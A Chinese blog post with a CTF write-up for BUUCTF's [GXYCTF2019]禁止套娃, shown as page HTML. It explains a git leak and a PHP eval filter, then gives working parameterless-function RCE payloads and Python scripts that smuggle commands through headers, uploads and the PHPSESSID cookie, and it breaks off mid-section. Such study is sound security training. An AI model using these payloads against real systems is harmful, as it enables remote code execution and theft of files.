<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-noah.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-noah.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-noah.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"buttons","active":"valine","storage":true,"lazyload":false,"nav":null,"activeClass":"valine"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":true},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="无参数函数RCE - [GXYCTF2019]禁止套娃思路dirsearch扫描目录，发现git泄露。">
<meta property="og:type" content="article">
<meta property="og:title" content="无参数函数RCE - [GXYCTF2019]禁止套娃">
<meta property="og:url" content="http://example.com/2021/05/17/%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83/index.html">
<meta property="og:site_name" content="NoahBox">
<meta property="og:description" content="无参数函数RCE - [GXYCTF2019]禁止套娃思路dirsearch扫描目录，发现git泄露。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/05/17/y2WUmqjf1PwszM3.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/dfNPp4GvZiFX1lt.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/ab36osRehrwm92p.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/nGwO12Lqf8RTlMS.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/GiUO7jWb9oNn5us.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/yfUEkoAd3L4TrOD.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/9nATCLsDBEQ6k7m.png">
<meta property="og:image" content="https://skysec.top/images/2019-03-29-13-46-53.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/smoGLt9WQpVBOec.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/e37n6aKmr8ltSRk.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/aDZc8A35I2htOTS.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/iJ5DHhM1Ckt64rn.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/Z2cj76yPiuSaJKw.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/GD4ablcHP5LOR9z.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/zFdoV7PbWg6TjRw.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/JRq4udNMxn5b7T6.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/B59YwlQLJ8NzjnS.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/NfUitV5pDJSko4O.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/UEqpSwu3fTtJjoY.png">
<meta property="og:image" content="https://i.loli.net/2021/05/17/GqH17RMsWTveUYh.png">
<meta property="article:published_time" content="2021-05-17T13:21:14.858Z">
<meta property="article:modified_time" content="2021-05-17T13:34:15.001Z">
<meta property="article:author" content="NoahTie">
<meta property="article:tag" content="WEB">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="BUUCTF">
<meta property="article:tag" content="PHP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/05/17/y2WUmqjf1PwszM3.png">

<link rel="canonical" href="http://example.com/2021/05/17/%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>无参数函数RCE - [GXYCTF2019]禁止套娃 | NoahBox</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="NoahBox" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">NoahBox</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Hell is Other People.</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-guestbook">

    <a href="/guestbook/" rel="section"><i class="fa fa-book fa-fw"></i>留言簿</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/05/17/%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="NoahTie">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="NoahBox">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          无参数函数RCE - [GXYCTF2019]禁止套娃
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-05-17 21:21:14 / 修改时间：21:34:15" itemprop="dateCreated datePublished" datetime="2021-05-17T21:21:14+08:00">2021-05-17</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span id="/2021/05/17/%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83/" class="post-meta-item leancloud_visitors" data-flag-title="无参数函数RCE - [GXYCTF2019]禁止套娃" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2021/05/17/%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/05/17/%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="无参数函数RCE-GXYCTF2019-禁止套娃"><a href="#无参数函数RCE-GXYCTF2019-禁止套娃" class="headerlink" title="无参数函数RCE - [GXYCTF2019]禁止套娃"></a>无参数函数RCE - [GXYCTF2019]禁止套娃</h1><h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><p><code>dirsearch</code>扫描目录，发现<code>git</code>泄露。</p>
<p><img src="https://i.loli.net/2021/05/17/y2WUmqjf1PwszM3.png" alt="image-20210517200229361"></p>
<span id="more"></span>

<p><code>githack</code>下载<code>index.php</code>。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;flag在哪里呢？&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">&#x27;exp&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span> (!preg_match(<span class="string">&#x27;/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i&#x27;</span>, $_GET[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === preg_replace(<span class="string">&#x27;/[a-z,_]+\((?R)?\)/&#x27;</span>, <span class="literal">NULL</span>, $_GET[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!preg_match(<span class="string">&#x27;/et|na|info|dec|bin|hex|oct|pi|log/i&#x27;</span>, $_GET[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">                <span class="comment">// echo $_GET[&#x27;exp&#x27;];</span></span><br><span class="line">                @<span class="keyword">eval</span>($_GET[<span class="string">&#x27;exp&#x27;</span>]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;还差一点哦！&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;再好好想想！&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;还想读flag，臭弟弟！&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// highlight_file(__FILE__);</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>第六行过滤了<code>data</code>、<code>filter</code>、<code>php</code>、<code>phar</code>几种协议。</p>
<p>第七行使用<code>preg_replace</code>，将形如<code>xxx(</code>的字符串和<code>)</code>递归式地删除。若最后只剩下了<code>;</code>，则通过检查。</p>
<p>第八行过滤了<code>et</code>、<code>na</code>、<code>info</code>、<code>dec</code>、<code>bin</code>、<code>hex</code>、<code>oct</code>、<code>pi</code>、<code>log</code>，进制转换和带有<code>get</code>的函数都无法执行。</p>
<p>因为第六行的过滤，无法直接进行文件读取，而第10行就可以进行有条件的代码执行。</p>
<p>通过七八两行的过滤，此处的代码执行只能执行类似<code>aaa(bbb(ccc(ddd())));</code>这样的套娃代码。</p>
<h2 id="payload构造"><a href="#payload构造" class="headerlink" title="payload构造"></a>payload构造</h2><ol>
<li>使用<code>print_r()</code>进行输出；</li>
<li>使用<code>readfile()</code>或<code>highlight_file()</code>读取文件；</li>
</ol>
<p>这样一来，就需要想办法用函数构造<code>flag.php</code>。</p>
<ol start="3">
<li><p>用<code>scandir()</code>来获取当前目录下全部文件和目录。</p>
<p><img src="https://i.loli.net/2021/05/17/dfNPp4GvZiFX1lt.png" alt="image-20210517194829253"></p>
</li>
</ol>
<p>但是<code>scandir()</code>需要传入路径作为参数。读取当前目录时应该传入<code>.</code>。接下来就要用函数来构造一个<code>.</code>。</p>
<ol start="4">
<li>使用<code>localeconv()</code>获取第一项为<code>.</code>的数组。</li>
</ol>
<blockquote>
<p><strong>定义和用法</strong></p>
<p><code>localeconv() </code>函数返回一包含本地数字及货币格式信息的数组。<br><code>localeconv() </code>函数会返回以下数组元素：</p>
<ul>
<li>[decimal_point] - 小数点字符。</li>
<li>[thousands_sep] - 千位分隔符。</li>
<li>[int_curr_symbol] - 货币符号 （例如：USD）。</li>
<li>[currency_symbol] - 货币符号 （例如：$）。</li>
<li>[mon_decimal_point] - 货币小数点字符。</li>
<li>[mon_thousands_sep] - 货币千位分隔符。</li>
<li>……</li>
</ul>
</blockquote>
<p>接下来获取<code>localeconv()</code>返回数组的第一位即可。</p>
<ol start="5">
<li>使用<code>current()</code>、<code>pos()</code>来获取数组的第一项。</li>
</ol>
<blockquote>
<ul>
<li><code>pos()</code> 函数返回数组中的当前元素的值。该函数是 <code>current()</code> 函数的别名。</li>
<li><code>current()</code> 返回数组中的当前元素的值。</li>
<li><code>end()</code> 将内部指针指向数组中的最后一个元素，并输出。</li>
<li><code>next()</code> 将内部指针指向数组中的下一个元素，并输出。</li>
<li><code>prev()</code> 将内部指针指向数组中的上一个元素，并输出。</li>
<li><code>reset()</code> 将内部指针指向数组中的第一个元素，并输出。</li>
<li><code>each()</code> 返回当前元素的键名和键值，并将内部指针向前移动。</li>
</ul>
</blockquote>
<p>将目前的<code>payload</code>send一下，返回数组的第3项是<code>flag.php</code>。</p>
<p><img src="https://i.loli.net/2021/05/17/ab36osRehrwm92p.png" alt="image-20210517195836652"></p>
<ol start="6">
<li><p>通过<code>array_reverse()</code>将返回数组反转过来，用<code>next()</code>获取第二项。</p>
<p><img src="https://i.loli.net/2021/05/17/nGwO12Lqf8RTlMS.png" alt="image-20210517200504272"></p>
<blockquote>
<p>但，如果array再多几项，并且<code>flag.php</code>并不位于前后两位。</p>
<p>这时就不能使用<code>pos()</code>、<code>end()</code>、<code>next()</code>了。</p>
<p>可以使用<code>arrar_rand()</code>来获取array中的随机项，不过这样获取的是array的key，而不是值。</p>
<p>为了获取值，还需要使用<code>array_filp()</code>函数，将array的键值对调换。</p>
<p>此时，payload：<code>?exp=print_r(readfile(array_rand(array_flip(scandir(current(localeconv())))));</code></p>
</blockquote>
</li>
</ol>
<p>至此，payload已经构造完毕：<code>?exp=print_r(readfile(next(array_reverse(scandir(pos(localeconv()))))));</code>。</p>
<h2 id="世界线二"><a href="#世界线二" class="headerlink" title="世界线二"></a>世界线二</h2><p>既然<code>RCE</code>的部分存在严格过滤，那么让<code>payload</code>调用其它地方的代码。</p>
<p>除了<code>RCE</code>部分之外，可控的输入还有一处，即<code>PHPSESSID</code>。</p>
<p>可以使用<code>session_start()</code>来获取当前用户设置的session，并使用<code>session_id()</code>来获取session的值。</p>
<p>构造payload：</p>
<ul>
<li><code>RCE</code>部分：<code>?exp=readfile(session_id(session_start()));</code></li>
<li>PHPSESSID：<code>PHPSESSID=flag.php</code></li>
</ul>
<h2 id="More-about-RCE"><a href="#More-about-RCE" class="headerlink" title="More about RCE"></a>More about RCE</h2><h3 id="什么是无参数函数RCE"><a href="#什么是无参数函数RCE" class="headerlink" title="什么是无参数函数RCE"></a>什么是无参数函数RCE</h3><p>传统意义上，如果我们有</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eval($_GET[&#39;code&#39;]);</span><br></pre></td></tr></table></figure>

<p>即代表我们拥有了一句话木马，可以进行getshell，例如</p>
<p><img src="https://i.loli.net/2021/05/17/GiUO7jWb9oNn5us.png" alt="img"></p>
<p>但是如果有如下限制</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === preg_replace(<span class="string">&#x27;/[^\W]+\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $_GET[<span class="string">&#x27;code&#x27;</span>])) &#123;    </span><br><span class="line">    <span class="keyword">eval</span>($_GET[<span class="string">&#x27;code&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们会发现我们使用参数则无法通过正则的校验</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/[^\W]+\((?R)?\)/</span><br></pre></td></tr></table></figure>

<p>而该正则，正是我们说的无参数函数的校验，其只允许执行如下格式函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a(b(c()));</span><br><span class="line">a();</span><br></pre></td></tr></table></figure>

<p>但不允许</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a(&#39;123&#39;);</span><br></pre></td></tr></table></figure>

<p>这样一来，失去了参数，我们进行RCE的难度则会大幅上升。<br>而本篇文章旨在bypass这种限制，并做出一些更苛刻条件的Bypass。</p>
<h3 id="法1：getenv"><a href="#法1：getenv" class="headerlink" title="法1：getenv()"></a>法1：getenv()</h3><p>查阅php手册，有非常多的超全局变量</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$GLOBALS</span><br><span class="line">$_SERVER</span><br><span class="line">$_GET</span><br><span class="line">$_POST</span><br><span class="line">$_FILES</span><br><span class="line">$_COOKIE</span><br><span class="line">$_SESSION</span><br><span class="line">$_REQUEST</span><br><span class="line">$_ENV</span><br></pre></td></tr></table></figure>

<p>我们可以使用<code>$_ENV</code>，对应函数为<code>getenv()</code></p>
<p><img src="https://i.loli.net/2021/05/17/yfUEkoAd3L4TrOD.png" alt="img"></p>
<p>虽然<code>getenv()</code>可获取当前环境变量，但我们怎么从一个偌大的数组中取出我们指定的值成了问题</p>
<p>这里可以使用方法：</p>
<p><img src="https://i.loli.net/2021/05/17/9nATCLsDBEQ6k7m.png" alt="img"></p>
<p>效果如下</p>
<p><img src="https://skysec.top/images/2019-03-29-13-46-53.png" alt="img"></p>
<p>但是我不想要下标，我想要数组的值，那么我们可以使用</p>
<p><img src="https://i.loli.net/2021/05/17/smoGLt9WQpVBOec.png" alt="img"></p>
<p>两者结合使用即可有如下效果</p>
<p><img src="https://i.loli.net/2021/05/17/e37n6aKmr8ltSRk.png" alt="img"></p>
<p>我们则可用爆破的方式获取数组中任意位置需要的值，那么即可使用<code>getenv()</code>，并获取指定位置的恶意参数</p>
<h3 id="法二：getallheaders"><a href="#法二：getallheaders" class="headerlink" title="法二：getallheaders()"></a>法二：getallheaders()</h3><p>之前我们获取的是所有环境变量的列表，但其实我们并不需要这么多信息。仅仅http header即可<br>在apache2环境下，我们有函数<code>getallheaders()</code>可返回<br>我们可以看一下返回值</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span>(<span class="number">8</span>) &#123; </span><br><span class="line">    [<span class="string">&quot;Host&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">14</span>) <span class="string">&quot;106.14.114.127&quot;</span> </span><br><span class="line">    [<span class="string">&quot;Connection&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">10</span>) <span class="string">&quot;keep-alive&quot;</span> </span><br><span class="line">    [<span class="string">&quot;Cache-Control&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">9</span>) <span class="string">&quot;max-age=0&quot;</span> </span><br><span class="line">    [<span class="string">&quot;Upgrade-Insecure-Requests&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">1</span>) <span class="string">&quot;1&quot;</span> </span><br><span class="line">    [<span class="string">&quot;User-Agent&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">120</span>) <span class="string">&quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36&quot;</span> </span><br><span class="line">    [<span class="string">&quot;Accept&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">118</span>) <span class="string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3&quot;</span></span><br><span class="line">     [<span class="string">&quot;Accept-Encoding&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">13</span>) <span class="string">&quot;gzip, deflate&quot;</span> [<span class="string">&quot;Accept-Language&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">14</span>) <span class="string">&quot;zh-CN,zh;q=0.9&quot;</span> </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们可以看到，成功返回了http header，我们可以在header中做一些自定义的手段，例如</p>
<p><img src="https://i.loli.net/2021/05/17/aDZc8A35I2htOTS.png" alt="img"></p>
<p>此时我们再将结果中的恶意命令取出</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var_dump(end(getallheaders()));</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/05/17/iJ5DHhM1Ckt64rn.png" alt="img"></p>
<p>这样一来相当于我们将http header中的sky变成了我们的参数，可用其进行bypass 无参数函数执行</p>
<p>例如</p>
<p><img src="https://i.loli.net/2021/05/17/Z2cj76yPiuSaJKw.png" alt="img"></p>
<p>那么可以进一步利用http header的sky属性进行rce</p>
<p><img src="https://i.loli.net/2021/05/17/GD4ablcHP5LOR9z.png" alt="img"></p>
<h3 id="法三：get-defined-vars"><a href="#法三：get-defined-vars" class="headerlink" title="法三：get_defined_vars()"></a>法三：get_defined_vars()</h3><p>使用<code>getallheaders()</code>其实具有局限性，因为他是apache的函数，如果目标中间件不为apache，那么这种方法就会失效，我们也没有更加普遍的方式呢？</p>
<p>这里我们可以使用<code>get_defined_vars()</code>，首先看一下它的回显</p>
<p><img src="https://i.loli.net/2021/05/17/zFdoV7PbWg6TjRw.png" alt="img"></p>
<p>发现其可以回显全局变量</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$_GET</span><br><span class="line">$_POST</span><br><span class="line">$_FILES</span><br><span class="line">$_COOKIE</span><br></pre></td></tr></table></figure>

<p>我们这里的选择也就具有多样性，可以利用<code>$_GET</code>进行RCE，例如</p>
<p><img src="https://i.loli.net/2021/05/17/JRq4udNMxn5b7T6.png" alt="img"></p>
<p>还是和之前的思路一样，将恶意参数取出</p>
<p><img src="https://i.loli.net/2021/05/17/B59YwlQLJ8NzjnS.png" alt="img"></p>
<p>发现可以成功RCE</p>
<p>但一般网站喜欢对</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$_GET</span><br><span class="line">$_POST</span><br><span class="line">$_COOKIE</span><br></pre></td></tr></table></figure>

<p>做全局过滤，所以我们可以尝试从<code>$_FILES</code>下手，这就需要我们自己写一个上传</p>
<p><img src="https://i.loli.net/2021/05/17/NfUitV5pDJSko4O.png" alt="img"></p>
<p>可以发现空格会被替换成，为防止干扰我们用hex编码进行<code>RCE</code></p>
<p><img src="https://i.loli.net/2021/05/17/UEqpSwu3fTtJjoY.png" alt="img"></p>
<p>最终脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> io <span class="keyword">import</span> BytesIO</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;system(&#x27;ls /tmp&#x27;);&quot;</span>.encode(<span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line">files = &#123;</span><br><span class="line">  payload: BytesIO(<span class="string">&#x27;sky cool!&#x27;</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">r = requests.post(<span class="string">&#x27;http://localhost/skyskysky.php?code=eval(hex2bin(array_rand(end(get_defined_vars()))));&#x27;</span>, files=files, allow_redirects=<span class="literal">False</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> r.content</span><br></pre></td></tr></table></figure>

<h3 id="法四：session-id"><a href="#法四：session-id" class="headerlink" title="法四：session_id()"></a>法四：session_id()</h3><p>之前我们使用<code>$_FILES</code>下手，其实这里还能从<code>$_COOKIE</code>下手：</p>
<p>我们有函数</p>
<p><img src="https://i.loli.net/2021/05/17/GqH17RMsWTveUYh.png" alt="img"></p>
<p>可以获取<code>PHPSESSID</code>的值，而我们知道<code>PHPSESSID</code>允许字母和数字出现，那么我们就有了新的思路，即<code>hex2bin</code></p>
<p>脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;http://localhost/?code=eval(hex2bin(session_id(session_start())));&#x27;</span></span><br><span class="line">payload = <span class="string">&quot;echo &#x27;sky cool&#x27;;&quot;</span>.encode(<span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line">cookies = &#123;</span><br><span class="line">	<span class="string">&#x27;PHPSESSID&#x27;</span>:payload</span><br><span class="line">&#125;</span><br><span class="line">r = requests.get(url=url,cookies=cookies)</span><br><span class="line"><span class="keyword">print</span> r.content</span><br></pre></td></tr></table></figure>

<p>即可达成<code>RCE</code>和bypass的目的</p>
<h3 id="法五：dirname-amp-chdir"><a href="#法五：dirname-amp-chdir" class="headerlink" title="法五：dirname() &amp; chdir()"></a>法五：dirname() &amp; chdir()</h3><p>为什么一定要<code>RCE</code>呢？我们能不能直接读文件？</p>
<p>之前的方法都基于可以进行RCE，如果目标真的不能RCE呢？我们能不能进行任意读取？</p>
<p>那么想读文件，就必须进行目录遍历，没有参数，怎么进行目录遍历呢？</p>
<p>首先，我们可以利用<code>getcwd()</code>获取当前目录</p>
